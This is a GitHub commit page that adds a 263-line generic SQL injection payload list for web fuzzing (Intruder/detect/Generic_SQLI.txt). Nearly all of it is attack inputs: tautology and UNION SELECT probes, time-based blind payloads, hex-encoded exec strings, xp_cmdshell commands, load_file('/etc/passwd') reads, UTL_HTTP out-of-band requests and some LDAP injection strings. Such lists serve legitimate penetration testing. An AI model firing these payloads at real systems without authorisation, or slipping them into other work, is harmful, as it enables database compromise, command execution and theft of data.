Commit b9a1887

author

İsmail Taşdelen

authored

Update Generic_SQLI.txt

1 parent b46bb66 commit b9a1887Copy full SHA for b9a1887

File tree

1 file changed

+263

-1

lines changed

Intruder/detect
- Generic_SQLI.txt

1 file changed

+263

-1

lines changed

`‎Intruder/detect/Generic_SQLI.txt`

Lines changed: 263 additions & 1 deletion

Original file line number	Diff line number	Diff line change
`@@ -1 +1,263 @@`
`1`		`-`
	`1`	`+)%20or%20('x'='x`
	`2`	`+%20or%201=1`
	`3`	`+; execute immediate 'sel' \|\| 'ect us' \|\| 'er'`
	`4`	`+benchmark(10000000,MD5(1))#`
	`5`	`+update`
	`6`	`+";waitfor delay '0:0:__TIME__'--`
	`7`	`+1) or pg_sleep(__TIME__)--`
	`8`	`+\|\|(elt(-3+5,bin(15),ord(10),hex(char(45))))`
	`9`	`+hi"""") or (""""a""""=""""a"""`
	`10`	`+delete`
	`11`	`+like`
	`12`	`+" or sleep(__TIME__)#`
	`13`	`+pg_sleep(__TIME__)--`
	`14`	`+(\|(objectclass=))`
	`15`	`+declare @q nvarchar (200) 0x730065006c00650063 ...`
	`16`	`+ or 0=0 #`
	`17`	`+insert`
	`18`	`+1) or sleep(__TIME__)#`
	`19`	`+) or ('a'='a`
	`20`	`+; exec xp_regread`
	`21`	`+*\|`
	`22`	`+@var select @var as var into temp end --`
	`23`	`+1)) or benchmark(10000000,MD5(1))#`
	`24`	`+asc`
	`25`	`+(\|\|6)`
	`26`	`+a"""" or 3=3--"""`
	`27`	`+" or benchmark(10000000,MD5(1))#`
	`28`	`+# from wapiti`
	`29`	`+ or 0=0 --`
	`30`	`+1 waitfor delay '0:0:10'--`
	`31`	`+ or 'a'='a`
	`32`	`+hi or 1=1 --"`
	`33`	`+or a = a`
	`34`	`+ UNION ALL SELECT`
	`35`	`+) or sleep(__TIME__)='`
	`36`	`+)) or benchmark(10000000,MD5(1))#`
	`37`	`+hi' or 'a'='a`
	`38`	`+0`
	`39`	`+21%`
	`40`	`+limit`
	`41`	`+ or 1=1`
	`42`	`+ or 2 > 1`
	`43`	`+")) or benchmark(10000000,MD5(1))#`
	`44`	`+PRINT`
	`45`	`+hi') or ('a'='a`
	`46`	`+ or 3=3`
	`47`	`+));waitfor delay '0:0:__TIME__'--`
	`48`	`+a' waitfor delay '0:0:10'--`
	`49`	`+1;(load_file(char(47,101,116,99,47,112,97,115, ...`
	`50`	`+or%201=1`
	`51`	`+1 or sleep(__TIME__)#`
	`52`	`+or 1=1`
	`53`	`+ and 1 in (select var from temp)--`
	`54`	`+ or '7659'='7659`
	`55`	`+ or 'text' = n'text'`
	`56`	`+ --`
	`57`	`+ or 1=1 or ''='`
	`58`	`+declare @s varchar (200) select @s = 0x73656c6 ...`
	`59`	`+exec xp`
	`60`	`+; exec master..xp_cmdshell 'ping 172.10.1.255'--`
	`61`	`+3.10E+17`
	`62`	`+ or pg_sleep(__TIME__)--"`
	`63`	`+x' AND email IS NULL; --`
	`64`	`+&`
	`65`	`+admin' or '`
	`66`	`+ or 'unusual' = 'unusual'`
	`67`	`+//`
	`68`	`+truncate`
	`69`	`+1) or benchmark(10000000,MD5(1))#`
	`70`	`+\x27UNION SELECT`
	`71`	`+declare @s varchar(200) select @s = 0x77616974 ...`
	`72`	`+tz_offset`
	`73`	`+sqlvuln`
	`74`	`+"));waitfor delay '0:0:__TIME__'--`
	`75`	`+\|\|6`
	`76`	`+or%201=1 --`
	`77`	`+%2A%28%7C%28objectclass%3D%2A%29%29`
	`78`	`+or a=a`
	`79`	`+) union select * from information_schema.tables;`
	`80`	`+PRINT @@variable`
	`81`	`+or isNULL(1/0) /*`
	`82`	`+26 %`
	`83`	`+ or ""a""=""a"`
	`84`	`+(sqlvuln)`
	`85`	`+x' AND members.email IS NULL; --`
	`86`	`+ or 1=1--`
	`87`	`+ and 1=( if((load_file(char(110,46,101,120,11 ...`
	`88`	`+0x770061006900740066006F0072002000640065006C00 ...`
	`89`	`+%20'sleep%2050'`
	`90`	`+as`
	`91`	`+1)) or pg_sleep(__TIME__)--`
	`92`	`+//or//1//=//1`
	`93`	`+ union all select @@version--`
	`94`	`+,@variable`
	`95`	`+(sqlattempt2)`
	`96`	`+ or (EXISTS)`
	`97`	`+t'exec master..xp_cmdshell 'nslookup www.googl ...`
	`98`	`+%20$(sleep%2050)`
	`99`	`+1 or benchmark(10000000,MD5(1))#`
	`100`	`+%20or%20''='`
	`101`	`+\|\|UTL_HTTP.REQUEST`
	`102`	`+ or pg_sleep(__TIME__)--`
	`103`	`+hi' or 'x'='x';`
	`104`	`+) or sleep(__TIME__)=`
	`105`	`+ or 'whatever' in ('whatever')`
	`106`	`+; begin declare @var varchar(8000) set @var=' ...`
	`107`	`+ union select 1,load_file('/etc/passwd'),1,1,1;`
	`108`	`+0x77616974666F722064656C61792027303A303A313027 ...`
	`109`	`+exec(@s)`
	`110`	`+) or pg_sleep(__TIME__)--`
	`111`	`+ union select`
	`112`	`+ or sleep(__TIME__)#`
	`113`	`+ select * from information_schema.tables--`
	`114`	`+a' or 1=1--`
	`115`	`+a' or 'a' = 'a`
	`116`	`+declare @s varchar(22) select @s =`
	`117`	`+ or 2 between 1 and 3`
	`118`	`+ or a=a--`
	`119`	`+ or '1'='1`
	`120`	`+\|`
	`121`	`+ or sleep(__TIME__)='`
	`122`	`+ or 1 --'`
	`123`	`+or 0=0 #"`
	`124`	`+having`
	`125`	`+a'`
	`126`	`+" or isNULL(1/0) /*`
	`127`	`+declare @s varchar (8000) select @s = 0x73656c ...`
	`128`	`+â or 1=1 --`
	`129`	`+char%4039%41%2b%40SELECT`
	`130`	`+order by`
	`131`	`+bfilename`
	`132`	`+ having 1=1--`
	`133`	`+) or benchmark(10000000,MD5(1))#`
	`134`	`+ or username like char(37);`
	`135`	`+;waitfor delay '0:0:__TIME__'--`
	`136`	`+ or 1=1--"`
	`137`	`+x' AND userid IS NULL; --`
	`138`	`+/`
	`139`	`+ or 'text' > 't'`
	`140`	`+ (select top 1`
	`141`	`+ or benchmark(10000000,MD5(1))#`
	`142`	`+");waitfor delay '0:0:__TIME__'--`
	`143`	`+a' or 3=3--`
	`144`	`+ -- &password=`
	`145`	`+ group by userid having 1=1--`
	`146`	`+ or ''='`
	`147`	`+; exec master..xp_cmdshell`
	`148`	`+%20or%20x=x`
	`149`	`+select`
	`150`	`+)) or sleep(__TIME__)="""`
	`151`	`+0x730065006c0065006300740020004000400076006500 ...`
	`152`	`+hi' or 1=1 --`
	`153`	`+") or pg_sleep(__TIME__)--`
	`154`	`+%20or%20'x'='x`
	`155`	`+ or 'something' = 'some'+'thing'`
	`156`	`+exec sp`
	`157`	`+29 %`
	`158`	`+(`
	`159`	`+Ã1⁄2 or 1=1 --`
	`160`	`+1 or pg_sleep(__TIME__)--`
	`161`	`+0 or 1=1`
	`162`	`+) or (a=a`
	`163`	`+uni//on sel//ect`
	`164`	`+replace`
	`165`	`+%27%20or%201=1`
	`166`	`+)) or pg_sleep(__TIME__)--`
	`167`	`+%7C`
	`168`	`+x' AND 1=(SELECT COUNT(*) FROM tabname); --`
	`169`	`+'%20OR`
	`170`	`+; or '1'='1'`
	`171`	`+declare @q nvarchar (200) select @q = 0x770061 ...`
	`172`	`+1 or 1=1`
	`173`	`+; exec ('sel' + 'ect us' + 'er')`
	`174`	`+23 OR 1=1`
	`175`	`+/`
	`176`	`+anything' OR 'x'='x`
	`177`	`+declare @q nvarchar (4000) select @q =`
	`178`	`+or 0=0 --`
	`179`	`+desc`
	`180`	`+\|\|'6`
	`181`	`+)`
	`182`	`+1)) or sleep(__TIME__)#`
	`183`	`+or 0=0 #`
	`184`	`+ select name from syscolumns where id = (sele ...`
	`185`	`+hi or a=a`
	`186`	`+(\|(mail=))`
	`187`	`+password:*/=1--`
	`188`	`+distinct`
	`189`	`+);waitfor delay '0:0:__TIME__'--`
	`190`	`+to_timestamp_tz`
	`191`	`+) or benchmark(10000000,MD5(1))#"`
	`192`	`+%2A%28%7C%28mail%3D%2A%29%29`
	`193`	`+#NAME?`
	`194`	`+ or 1=1 /*`
	`195`	`+)) or sleep(__TIME__)='`
	`196`	`+or 1=1 or ""=`
	`197`	`+ or 1 in (select @@version)--`
	`198`	`+sqlvuln;`
	`199`	`+ union select * from users where login = char ...`
	`200`	`+x' or 1=1 or 'x'='y`
	`201`	`+28%`
	`202`	`+â or 3=3 --`
	`203`	`+@variable`
	`204`	`+ or '1'='1'--`
	`205`	`+a" or 1=1--`
	`206`	`+//*`
	`207`	`+%2A%7C`
	`208`	`+" or 0=0 --`
	`209`	`+)) or pg_sleep(__TIME__)--"`
	`210`	`+?`
	`211`	`+ or 1/*`
	`212`	`+!`
	`213`	`+'`
	`214`	`+ or a = a`
	`215`	`+declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)`
	`216`	`+declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)`
	`217`	`+declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)`
	`218`	`+declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)`
	`219`	`+' or 1=1`
	`220`	`+ or 1=1 --`
	`221`	`+x' OR full_name LIKE '%Bob%`
	`222`	`+'; exec master..xp_cmdshell 'ping 172.10.1.255'--`
	`223`	`+'%20or%20''='`
	`224`	`+'%20or%20'x'='x`
	`225`	`+')%20or%20('x'='x`
	`226`	`+' or 0=0 --`
	`227`	`+' or 0=0 #`
	`228`	`+ or 0=0 #"`
	`229`	`+' or 1=1--`
	`230`	`+' or '1'='1'--`
	`231`	`+' or 1 --'`
	`232`	`+or 1=1--`
	`233`	`+' or 1=1 or ''='`
	`234`	`+ or 1=1 or ""=`
	`235`	`+' or a=a--`
	`236`	`+ or a=a`
	`237`	`+') or ('a'='a`
	`238`	`+'hi' or 'x'='x';`
	`239`	`+or`
	`240`	`+procedure`
	`241`	`+handler`
	`242`	`+' or username like '%`
	`243`	`+' or uname like '%`
	`244`	`+' or userid like '%`
	`245`	`+' or uid like '%`
	`246`	`+' or user like '%`
	`247`	`+'; exec master..xp_cmdshell`
	`248`	`+'; exec xp_regread`
	`249`	`+t'exec master..xp_cmdshell 'nslookup www.google.com'--`
	`250`	`+' UNION SELECT`
	`251`	`+' UNION ALL SELECT`
	`252`	`+' or (EXISTS)`
	`253`	`+' (select top 1`
	`254`	`+'\|\|UTL_HTTP.REQUEST`
	`255`	`+1;SELECT%20*`
	`256`	`+<>"'%;)(&+`
	`257`	`+'%20or%201=1`
	`258`	`+'sqlattempt1`
	`259`	`+29%`
	`260`	`+26%`
	`261`	`+' or ''='`
	`262`	`+' or 3=3`
	`263`	`+' or 3=3 --`

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

Commit b9a1887

File tree

1 file changed

1 file changed

`‎Intruder/detect/Generic_SQLI.txt`

0 commit comments